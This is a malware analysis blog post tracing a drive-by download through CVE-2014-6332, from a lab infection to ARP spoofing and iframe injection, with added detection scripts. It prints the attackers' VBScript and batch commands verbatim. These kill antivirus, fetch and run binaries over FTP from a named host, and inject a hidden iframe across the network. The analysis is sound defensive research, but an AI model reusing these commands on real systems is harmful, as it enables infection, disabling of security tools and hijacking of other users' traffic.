A drive-by download that exploits CVE-2014-6332
First, Happy Thanksgiving to anyone that celebrates this holiday. In reality, I hope that we're all thankful every day. Yes, I know- I'm working on a blog post on turkey day. It's alright because I already helped cook a few items for the dinner table later this evening, and I have some free time, so why not?
I'll keep this one short. If you follow Microsoft Patch Tuesdays like I do, then you probably know that Microsoft provided a patch for Microsoft Security Bulletin MS14-064, which was rated as critical. You can learn more about it here.
The bulletin was assigned the following two CVE numbers:
- Microsoft Windows OLE Automation Array Remote Code Execution Vulnerability (CVE-2014-6332)
- Microsoft Windows OLE Remote Code Execution Vulnerability (CVE-2014-6352)
In this post, I want to talk about CVE-2014-6332, which has been observed in drive-by download attempts and exploit kits. For this particular post, I'm going to give an overview of a malicious site that I encountered serving this exploit. If you want to get an understanding of how this vulnerability can be exploited, take a look at the Metasploit module.
I'm going to provide some details, such as IP addresses, URLs, etc. Don't go clicking on these if you don't know what you're doing. These are publicly known, so I'm not worried about sharing them. Here we go.
All of the fun started after one of my virtual machines running a copy of Microsoft Windows XP Professional SP3 arrived at the following malicious URL serving this exploit:
- hxxp://104.152.215.90/1.html
Here's an example of the full HTTP GET request:
GET /1.html HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, */*
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET4.0C; .NET4.0E)
Host: 104.152.215.90
Connection: Keep-Alive
Next, as expected, we're served the exploit that will trigger the vulnerability on my virtual machine:
HTTP/1.1 200 OK
Content-Length: 6347
Content-Type: text/html
Last-Modified: Sun, 23 Nov 2014 15:55:08 GMT
Accept-Ranges: bytes
ETag: "d8d71adb357d01:333"
Server: Microsoft-IIS/6.0
Date: Wed, 26 Nov 2014 00:19:01 GMT
Note, I'm not going to post the entire response here. Here are the more interesting portions of the payload:
<SCRIPT LANGUAGE="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("wscript.shell")
shell.run "cmd.exe /q /c net user admin /del",0
shell.run "cmd.exe /q /c sc stop sharedaccess",0
shell.run "cmd.exe /q /c md C:\RECYCLER",0
shell.run "cmd.exe /q /c taskkill /f /im 360rp.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 360sd.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 360tray.exe",0
shell.run "cmd.exe /q /c taskkill /f /im arp1.exe",0
shell.run "cmd.exe /q /c taskkill /f /im arp2.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 360.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 361.exe",0
shell.run "cmd.exe /q /c del C:\docume~1\alluse~1\............\....\....\360.exe",0
shell.run "cmd.exe /q /c del C:\docume~1\alluse~1\............\....\....\361.exe",0
shell.run "cmd.exe /q /c del C:\RECYCLER\360.exe",0
shell.run "cmd.exe /q /c del C:\RECYCLER\361.exe",0
shell.run "cmd.exe /q /c copy c:\windows\system32\ftp.exe C:\RECYCLER\fp.exe",0
shell.run "cmd.exe /q /c copy c:\windows\system32\ftp.exe c:\windows\system32\fp.exe",0
shell.run "cmd.exe /q /c copy %systemroot%\system32\ftp.exe %systemroot%\system32\fp.exe",0
shell.run "cmd.exe /q /c echo open 104.152.215.90>C:\RECYCLER\fp.dw&echo do1>>C:\RECYCLER\fp.dw&echo 123456>>C:\RECYCLER\fp.dw&echo bin >>C:\RECYCLER\fp.dw&echo get arp2.exe C:\RECYCLER\arp2.exe>>C:\RECYCLER\fp.dw&echo get fa2.exe C:\RECYCLER\fa2.exe>>C:\RECYCLER\fp.dw&echo bye >>C:\RECYCLER\fp.dw&ping 127.0.0.1 -n 10&FP -s:C:\RECYCLER\fp.dw&del C:\RECYCLER\fp.dw /q&copy C:\RECYCLER\fa2.exe C:\docume~1\alluse~1\............\....\....\fa2.exe&copy C:\RECYCLER\arp2.exe C:\docume~1\alluse~1\............\....\....\arp2.exe&start C:\RECYCLER\fa2.exe&C:\RECYCLER\arp2.exe&del C:\RECYCLER\fp.exe",0
shell.run "cmd.exe /q /c echo open 104.152.215.90>C:\RECYCLER\ftp.dw&echo do1>>C:\RECYCLER\ftp.dw&echo 123456>>C:\RECYCLER\ftp.dw&echo bin >>C:\RECYCLER\ftp.dw&echo get arp2.exe C:\RECYCLER\arp22.exe>>C:\RECYCLER\ftp.dw&echo get fa2.exe C:\RECYCLER\faa.exe>>C:\RECYCLER\ftp.dw&echo bye >>C:\RECYCLER\ftp.dw&ping 127.0.0.1 -n 80&FtP -s:C:\RECYCLER\ftp.dw&del C:\RECYCLER\ftp.dw /q&copy C:\RECYCLER\faa.exe C:\docume~1\alluse~1\............\....\....\faa.exe&copy C:\RECYCLER\arp22.exe C:\docume~1\alluse~1\............\....\....\arp22.exe&start C:\RECYCLER\faa.exe&C:\RECYCLER\arp22.exe&del C:\RECYCLER\fp.exe",0
end function
</script>
At a quick glance, you can see something nasty is going on here. There are references to files in the RECYCLER folder, which we'll dig through shortly.
Next, I noticed interesting FTP traffic in Wireshark. The FTP server's address is actually listed in the VBScript above, which is the following:
- 104.152.215.90
Next, the juicy details about the FTP session:
220 Serv-U FTP Server v6.0 for WinSock ready...
USER do1
331 User name okay, need password.
PASS 123456
230 User logged in, proceed.
TYPE I
200 Type set to I.
PORT 192,168,130,135,4,52
200 PORT Command successful.
RETR arp2.exe
150 Opening BINARY mode data connection for arp2.exe (412693 Bytes).
226 Transfer complete.
PORT 192,168,130,135,4,53
200 PORT Command successful.
RETR fa2.exe
150 Opening BINARY mode data connection for fa2.exe (200704 Bytes).
226 Transfer complete.
QUIT
221 Goodbye!
We can clearly see that additional binaries were downloaded from the FTP server. I uploaded the samples to VirusTotal; here are the reports:
Those two are clearly malicious. From the filename alone, arp2 seems like it will do something with the Address Resolution Protocol (ARP). Initially, I suspected ARP poisoning.
Interestingly, the following suspicious ARP traffic was observed as soon as the FTP connection was terminated:
Note: you will have to right-click and Open the Image in a New Tab to view the screenshot in greater detail.
Essentially, you can see ARP requests for the following IP addresses:
- 192.168.130.1
- 192.168.130.3
- 192.168.130.4
- 192.168.130.5
- 192.168.130.X
That is, the last octet covers every host in the range 1-255. Following the ARP requests comes a flood of ARP replies. The interesting thing is that these replies are gratuitous ARP messages for 192.168.130.2, which is the IP address of the network's gateway. As an example:
Gratuitous ARP for 192.168.130.2 (Reply)
192.168.130.2 is at 00:0c:29:b3:ee:72
The MAC address that we see above is for the infected machine. So in plain English, our infected system is forcing other machines on the network to update the gateway's entry in their ARP tables so that it now points to our infected system. In other words, this is an example of ARP spoofing. Essentially, this causes the other machines' network traffic to be forwarded through our infected machine, which then acts like a proxy.
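The two symptoms described above (the gateway IP suddenly claimed by a second MAC, and a burst of gratuitous replies for it from one MAC) are easy to check for programmatically. This is an added detection example, not code from the post; the ARP records are constructed to mirror the capture, and the real gateway's MAC is a placeholder since the post does not list it.

```python
from collections import defaultdict

GATEWAY_IP = "192.168.130.2"
INFECTED_MAC = "00:0c:29:b3:ee:72"     # infected host's MAC from the capture above
REAL_GATEWAY_MAC = "00:0c:29:aa:aa:aa"  # constructed placeholder, not from the capture

# Constructed ARP reply records modelled on the capture: (sender IP, sender MAC,
# target IP). A gratuitous reply announces the sender's own IP as the target.
ARP_REPLIES = [
    (GATEWAY_IP, REAL_GATEWAY_MAC, "192.168.130.135"),  # normal reply from the gateway
    (GATEWAY_IP, INFECTED_MAC, GATEWAY_IP),             # gratuitous, spoofed
    (GATEWAY_IP, INFECTED_MAC, GATEWAY_IP),
    (GATEWAY_IP, INFECTED_MAC, GATEWAY_IP),
]

def is_gratuitous(sender_ip, target_ip):
    return sender_ip == target_ip

def detect_arp_spoof(replies, gateway_ip, flood_threshold=3):
    """Return alert strings for two signs of ARP spoofing seen in the capture:
    an IP claimed by more than one MAC, and a burst of gratuitous replies for
    the gateway IP from a single MAC."""
    claims = defaultdict(set)       # IP -> MACs that have claimed it
    gratuitous = defaultdict(int)   # MAC -> gratuitous replies for the gateway
    alerts = []
    for sender_ip, sender_mac, target_ip in replies:
        claims[sender_ip].add(sender_mac)
        if len(claims[sender_ip]) > 1:
            msg = f"conflict: {sender_ip} claimed by {sorted(claims[sender_ip])}"
            if msg not in alerts:   # report each conflicting set once
                alerts.append(msg)
        if sender_ip == gateway_ip and is_gratuitous(sender_ip, target_ip):
            gratuitous[sender_mac] += 1
            if gratuitous[sender_mac] == flood_threshold:
                alerts.append(f"gratuitous ARP flood for {gateway_ip} from {sender_mac}")
    return alerts

if __name__ == "__main__":
    for alert in detect_arp_spoof(ARP_REPLIES, GATEWAY_IP):
        print(alert)
```

On a real network you would feed the same tuples from a capture and seed `claims` with the known gateway MAC so the first spoofed reply alone raises the conflict.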
I continued to scroll down through the network traffic in Wireshark and started to observe DNS requests to suspicious domains:
The list of queried domains went on with many more similar variations. A number of them also appeared to belong to major anti-virus companies, like Kaspersky, AVG, ESET, etc. However, I did not verify whether they were or not.
Meanwhile, back on the file system level, I explored the contents of the RECYCLER folder on the root of the C drive. First, I enabled hidden files and folders on Windows, then I found the following items relaxing in there like it was a hot day at the beach.
Again, please right-click and Open the Image in a New Tab. At a quick glance, you can see some of the files that we mentioned earlier from the FTP session. Let's take a look inside some of these text-based files.
Inside of ip.txt is the infected machine's IP address. Inside of the install.bat file is the following:
copy npf.sys %systemroot%\system32\drivers
copy wpcap.dll %systemroot%\system32\
copy Packet.dll %systemroot%\system32\
@echo off
if exist ipconfig.txt del ipconfig.txt
ipconfig /all >ipconfig.txt
if exist IPAddr.txt del IPaddr.txt
find "IP Address" ipconfig.txt >IPAddr.txt
for /f "skip=2 tokens=15" %%K in (IPAddr.txt) do set IP=%%K
del IPAddr.txt
del ipconfig.txt
echo %ip%>ip.txt
del arp1.exe
del install.vbs
for /f "tokens=1-4 delims=." %%i in (ip.txt) do thatboy.exe -idx 0 -ip %%i.%%j.%%k.1-%%i.%%j.%%k.255 -port 80 -insert "<iframe src= http://104.152.215.90/1.html width=0 height=0></iframe>" -Interval 400 -spoofmode 2
cls
That definitely looks juicy, huh? I'm not sure what your initial thoughts are, but my gut feeling tells me that this malware poisons the ARP cache to trick other systems on the network to forward their traffic through the infected machine.
The infected machine then runs the thatboy.exe binary and attempts to inject the malicious IFRAME into network traffic on port 80. What does this achieve? Basically, other machines on the network will also be infected with the same piece of malware, since they would also be exposed to the same exploit landing page. Let's take a closer look at the individual files.
The first file we'll explore is arp2.exe. Based on the icon of this file, it looks like it was probably created using WinRAR. I tried to extract the contents using 7-Zip, and sure enough, it dumped a folder with the following files in it:
- install.bat
- install.vbs
- npf.sys
- Packet.dll
- wpcap.dll
So it looks like those files came from the file that was downloaded from the FTP server. I cracked the install.vbs file open, and here's what was inside:
Set lsxq=createobject("wscript.shell")
lsxq.run "install.bat",0
wscript.sleep(1000)
Honestly, this seems silly. I'm not really sure why this approach was taken, but whatever. Anyway, I also cracked open the install.bat file, but the contents were the same as those we already looked at above. Next, let's take a quick look at the executable, DLLs, and driver file.
The first binary is a file named thatboy.exe. I decided to dump this little guy into IDA Pro and take a look inside. I usually like to look through the strings first to see if there's anything I can use in there to zero in on. Thankfully, there were a lot of interesting strings in there, which ultimately led me to the source code of the tool that was being used.
Here's a screenshot of some of the interesting strings I found:
From the strings in this binary, the following are pretty interesting:
Restoring the ARPTable...
Killing the SpoofThread...
zxarps Build 01/17/2007 by LZX.
Sniffing...
Scanning Alive Host...
Found Alive Host...
HTTP/1.1 302 Object Moved
Location: %s%s
Server: Microsoft-IIS/5.1
Content-Type: text/html
Content-Length: 0
Connection: close
Naturally, it made sense for me to Google for zxarps by LZX to see what would come up. A lot of the listings were in Chinese, but I did find two awesome sources that describe this tool in much greater detail.
As I suspected, thatboy.exe is actually a tool called zxarps, which uses WinPCAP to "sniff network data, poison ARP caches and modify webpages on the fly." Visit the following blog post for more information on this tool.
Additional Google magic also led me to the source code of this tool. You can check out the source code on GitHub to learn more about the tool if you're curious.
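Both the hidden IFRAME that install.bat hands to thatboy.exe and the "302 Object Moved" response template in the zxarps strings leave a fingerprint in the HTTP traffic the victims see. This added example (my code, not the post's or the tool's) classifies raw HTTP responses on those two fingerprints; the three sample responses are constructed, with the redirect built from the header strings listed above.

```python
import re

# Constructed HTTP responses (not from the capture): a page carrying the hidden
# IFRAME that install.bat tells thatboy.exe to insert, a redirect built from the
# "302 Object Moved" template in the zxarps strings, and a benign page.
INJECTED_PAGE = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html><body>hi"
                 "<iframe src= http://104.152.215.90/1.html width=0 height=0></iframe>"
                 "</body></html>")
SPOOFED_REDIRECT = ("HTTP/1.1 302 Object Moved\r\nLocation: http://104.152.215.90/1.html"
                    "\r\nServer: Microsoft-IIS/5.1\r\nContent-Type: text/html\r\n"
                    "Content-Length: 0\r\nConnection: close\r\n\r\n")
BENIGN_PAGE = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html><body>"
               '<iframe src="/widget" width=300 height=200></iframe></body></html>')

IFRAME_TAG = re.compile(r'<iframe[^>]*src\s*=\s*["\']?\s*(https?://[^\s"\'>]+)[^>]*>', re.I)
ZERO_SIZE = re.compile(r'\b(width|height)\s*=\s*["\']?0\b', re.I)

def split_response(raw):
    """Split a raw HTTP response into (status line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def find_hidden_iframes(body):
    """Return external iframe URLs whose tag also declares width=0 or height=0."""
    return [m.group(1) for m in IFRAME_TAG.finditer(body) if ZERO_SIZE.search(m.group(0))]

def matches_zxarps_redirect(status, headers):
    """Fingerprint of the redirect template visible in the thatboy.exe strings."""
    return (status.startswith("HTTP/1.1 302 Object Moved")
            and headers.get("server") == "Microsoft-IIS/5.1"
            and headers.get("content-length") == "0"
            and headers.get("connection", "").lower() == "close")

def classify(raw):
    """Label one response: zxarps-redirect, hidden-iframe, or clean."""
    status, headers, body = split_response(raw)
    if matches_zxarps_redirect(status, headers):
        return "zxarps-redirect", headers.get("location")
    iframes = find_hidden_iframes(body)
    if iframes:
        return "hidden-iframe", iframes[0]
    return "clean", None
```

The header fingerprint alone will also match genuine IIS 5.1 redirects, so in practice correlate it with the ARP conflict on the gateway IP before raising an alert.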
The next executable that I took a quick look at was faa.exe. For reference, I uploaded the file to VirusTotal. Looking at the behavioral information tab, you can see all of the DNS requests that it attempted to do. Remember that we saw this in Wireshark earlier? This file looks like it could be a backdoor into the infected system.
Next, let's take a quick look at npf.sys. After some quick research online, this file turns out to be legitimate and is supposed to be part of WinPCAP. So to wrap up the arp2.exe file that we extracted all of these files from, here's what I believe happens in order:
- install.vbs executes install.bat
- install.bat copies the npf.sys file to \system32\drivers
- install.bat copies the wpcap.dll file to \system32
- install.bat copies the Packet.dll file to \system32
- install.bat creates ip.txt with the machine's IP address
- install.bat executes the thatboy.exe binary
So I was right. This malware performs ARP spoofing on the network to cause other systems to route their traffic through the infected system, and injects a malicious IFRAME into webpages.
Essentially, a user lands on the server that is serving up the malicious CVE-2014-6332 exploit. If the system is vulnerable, the VBScript is executed. This script uses the FTP utility on the machine to connect to a remote FTP server and download additional binaries, which include what appears to be a backdoor and the appropriate libraries for WinPCAP to work properly with thatboy.exe, a tool that can ARP spoof the network and inject a malicious IFRAME into the traffic of systems browsing the web.
So that about wraps up this post. It is a bit longer than I wanted it to be, but I thought it was fun to put the pieces together on this one. Oh, and I also had a great Thanksgiving dinner with my family earlier this evening. I hope you did also!